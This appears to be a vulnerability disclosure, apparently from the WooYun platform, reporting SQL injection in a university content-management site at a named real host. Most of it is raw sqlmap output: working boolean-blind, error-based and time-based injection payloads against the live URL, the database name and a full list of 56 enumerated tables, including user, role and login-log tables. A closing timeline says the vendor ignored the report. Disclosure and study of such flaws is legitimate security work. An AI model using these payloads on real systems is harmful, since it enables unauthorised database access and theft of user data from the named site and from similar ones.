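2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-28: The vendor actively ignored the vulnerability; details disclosed to the public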
http://cs973.tju.edu.cn/cmsstat/count?1=1&articleId=1&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 1=1&articleId=1' AND 7571=7571 AND 'xhJY'='xhJY&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: 1=1&articleId=1' AND (SELECT 2588 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(2588=2588,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sVZQ'='sVZQ&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: 1=1&articleId=1' AND (SELECT * FROM (SELECT(SLEEP(5)))AhGg) AND 'uVPB'='uVPB&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946
---
web application technology: Apache, JSP
back-end DBMS: MySQL 5.0
Database: cms_tdjsjxy_dev
[56 tables]
+---------------------------+
| qrtz_blob_triggers        |
| qrtz_calendars            |
| qrtz_cron_triggers        |
| qrtz_fired_triggers       |
| qrtz_job_details          |
| qrtz_job_listeners        |
| qrtz_locks                |
| qrtz_paused_trigger_grps  |
| qrtz_scheduler_state      |
| qrtz_simple_triggers      |
| qrtz_trigger_listeners    |
| qrtz_triggers             |
| t_ad                      |
| t_ad_page                 |
| t_bbs_reply               |
| t_bbs_subject             |
| t_bbs_user                |
| t_cms_article             |
| t_cms_article_recommend   |
| t_cms_base_page           |
| t_cms_base_panel          |
| t_cms_base_site_templet   |
| t_cms_catalog             |
| t_cms_catalog_crawl       |
| t_cms_frame               |
| t_cms_page                |
| t_cms_panel               |
| t_cms_rss                 |
| t_cms_rule                |
| t_cms_seo                 |
| t_cms_site                |
| t_cms_site_version_backup |
| t_cms_stat                |
| t_cms_style               |
| t_cms_templet             |
| t_db_bak                  |
| t_email                   |
| t_file_upload             |
| t_guest_book              |
| t_link                    |
| t_login_log               |
| t_menu                    |
| t_menu_role               |
| t_org                     |
| t_publish                 |
| t_research                |
| t_resource_article        |
| t_resource_file           |
| t_resource_fold           |
| t_role                    |
| t_survey                  |
| t_survey_option           |
| t_survey_subject          |
| t_sys_dic                 |
| t_user_role               |
| t_users                   |
+---------------------------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-28 19:28
Vulnerability Rank: 4 (WooYun rating)
None yet